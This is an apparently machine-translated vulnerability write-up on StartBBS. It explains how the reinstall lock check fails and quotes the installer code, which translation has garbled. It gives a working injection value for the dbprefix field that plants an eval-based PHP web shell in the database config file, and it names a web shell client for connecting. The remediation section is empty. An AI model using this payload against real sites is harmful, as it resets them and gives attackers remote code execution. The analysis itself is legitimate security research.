Open Source Light Forum Startbbs Front desk Getshell

read the code on impulse. Startbbs the interface is very refreshing, the volume is also small. Download the installation down. Installed after the discovery of the root directory more than one install. Lock, General CMS in order to prevent the re-installation will be in the directory to generate a similar file, the next time someone accesses the installation script, the script will detect, if the directory has this file will prompt "please delete and then install." There should be no problem at all. But we came to the installation script,/app/controllers/install.php, to see how it was handled:

 class  Install extends   install_controller{ function          __construct () {parent :: __construct ();          $this ->load->library (' MyClass '   $file  =fcpath. '        Install.lock ' ;  if  (file_exists  ( $file    $this -& Gt;myclass->notice (' Alert ' ("System has been installed"); window.location.href= "'. Site_url (). '"; '        

I laughed when I saw this. The constructor checks for the presence of Install.lock and then uses JavaScript to tell the user that the system has been installed and then jumps. But this script is not finished at all, the functions in this class can be run, not because the return of a window.location.href to stop running. (This->myclass->notice () also has no code to stop running)

Then, as you scroll down, you can see the installed function:

 Public functionStep$step){    $data[' Step ']=$step; if($step==1 | |$step==2){        $data[' permission '] =$this-_checkfileright (); $this->load->view (' Install ',$data); }    if($step==3){        $this-_install_do (); }}function_install_do () {$data[' Step ']=3; if($_post){                $dbhost=$this->input->post (' Dbhost '); $dbport=$this->input->post (' Dbport '); $dbname=$this->input->post (' dbname '); $dbuser=$this->input->post (' Dbuser '); $dbpwd=$this->input->post (' Dbpwd ')?$this->input->post (' dbpwd '): '; $dbprefix=$this->input->post (' Dbprefix '); $userid=$this->input->post (' admin '); $pwd=MD5($this->input->post (' pwd ')); $email=$this->input->post (' email '); $sub _folder= '/'.$this->input->post (' Base_url '). ' /‘; $conn=mysql_connect($dbhost.‘:‘.$dbport,$dbuser,$dbpwd); if(!$conn) {                 die(' Unable to connect to the database server, please check that the user name and password are correct '); }            if($this->input->post (' Creatdb ')){                if([Emailprotected]_query (' CREATE DATABASE IF not EXISTS '.$dbname)){                     die(' The specified database ('.$dbname.‘) System attempt to create failed, please create database by other means '); }            }            if(!mysql_select_db($dbname,$conn)){                 die($dbname.‘ The database does not exist, please create or check the data name. '); }                $sql=file_get_contents(Fcpath. ' App/config/startbbs.sql '); $sql=Str_replace("Sb_",$dbprefix,$sql); $explode=Explode(";",$sql); $data[' MSG1 ']= ' CREATE table '.$dbname." Success, please ......<br/> later "; foreach($explode  as $key=$value){                    if(!Empty($value)){                        if(Trim($value)){                            mysql_query($value.";"); }                    }                  }                $password=$pwd; $ip=$this->myclass->get_ip (); $insert= "INSERT into".$dbprefix." Users (GROUP_TYPE,GID,IS_ACTIVE,USERNAME,PASSWORD,EMAIL,REGTIME,IP) VALUES (' 0 ', ' 1 ', ' 1 ', ' ".$userid."‘,‘".$password."‘,‘".$email."‘,‘". Time()."‘,‘".$ip."‘)"; mysql_query($insert); Mysql_close($conn); $data[' MSG2 ']= ' installation complete, saving configuration file, please later ... "; $dbconfig= "<?php if (! Defined (' BasePath ')) exit (' No Direct script access allowed '); \ n "." \ $active _group = ' default '; \ n '. " \ $active _record = true;\n "." \ $db [' Default '] [' hostname '] = ' ".$dbhost."‘;\ N "." \ $db [' Default '] [' port '] = ' ".$dbport."‘;\ N "." \ $db [' Default '] [' username '] = ' ".$dbuser."‘;\ N "." \ $db [' Default '] [' password '] = ' ".$dbpwd."‘;\ N "." \ $db [' Default '] [' database '] = ' ".$dbname."‘;\ N "." \ $db [' Default '] [' dbdriver '] = ' mysql '; \ n '. " \ $db [' Default '] [' dbprefix '] = ' ".$dbprefix."‘;\ N "." \ $db [' Default '] [' pconnect '] = true;\n "." \ $db [' Default '] [' db_debug '] = true;\n "." \ $db [' Default '] [' cache_on '] = false;\n "." \ $db [' Default '] [' cachedir '] = ' app/cache '; \ n '. " \ $db [' Default '] [' char_set '] = ' utf8 '; \ n '. " \ $db [' Default '] [' dbcollat '] = ' utf8_general_ci '; \ n '. " \ $db [' Default '] [' swap_pre '] = '; \ n '. ' \ $db [' Default '] [' autoinit '] = true;\n "." \ $db [' Default '] [' stricton '] = FALSE; "; $file= Fcpath. ' /app/config/database.php '; file_put_contents($file,$dbconfig); //Save config file                if($sub _folder){                    $this->config->update (' myconfig ', ' Sub_folder ',$sub _folder); }                $encryption _key=MD5(uniqid()); if($encryption _key){                    $this->config->update (' myconfig ', ' Encryption_key ',$encryption _key); }                $data[' MSG3 ']= ' save config file complete! "; Touch(Fcpath. ' Install.lock '); $data[' Msg4 ']= ' Create lock installation file Install.lock successful '; $data[' Msg5 ']= ' installation Startbbs successful! "; }    $this->load->view (' Install ',$data);}

When the step function parameter is 3 o'clock, the installation function _install_do () is executed, the function initializes the database and writes the database configuration file to "/app/config/database.php". So, we can construct a packet to write a sentence directly into this configuration file.
We see that this function receives a lot of post data:

 dbhost = this->input->post (' dbhost '  = this->input-> Post (' Dbport '  = this->input->post (' dbname ') );d buser  = this->input->post (' dbuser '  = this->input->post (' dbpwd ')?  $this ->input->post (' dbpwd '): '  = This->input->post (' admin ' );p WD  = md5  (this->input-> Post (' pwd '  = this->input->post (' email ')  = '/'. This->input->post (' Base_url '). ' /'; 

of which Dbhost, Dbport, dbname, Dbuser, dbpwd can not casually write, disorderly write the words installed will be wrong, and userid, pwd, email, Sub_folder are written to the database, do not write to the configuration file. So there's dbprefix left, so we can construct this field like this:

dbprefix=sb_‘;@eval ($_POST[101]);$xxx=‘

Because this reinstall vulnerability is too damaging, Getshell after the site is reset, so I did not test online. The tests are done locally ~
Start by looking for an outside MySQL account to make the installation successful.
I created a new account test_db_user on my VPS, and then constructed the following packet to send:

Wait a while to find out the installation success prompt returned. Because I was testing locally, so I came to the site directory,/app/config/database.php

Remediation Scenarios

Exit

As you can see, a word has been written. Kitchen Knife Connection index.php on it, directly connected to this database configuration file is not possible.

Open Source Light Forum Startbbs Front desk Getshell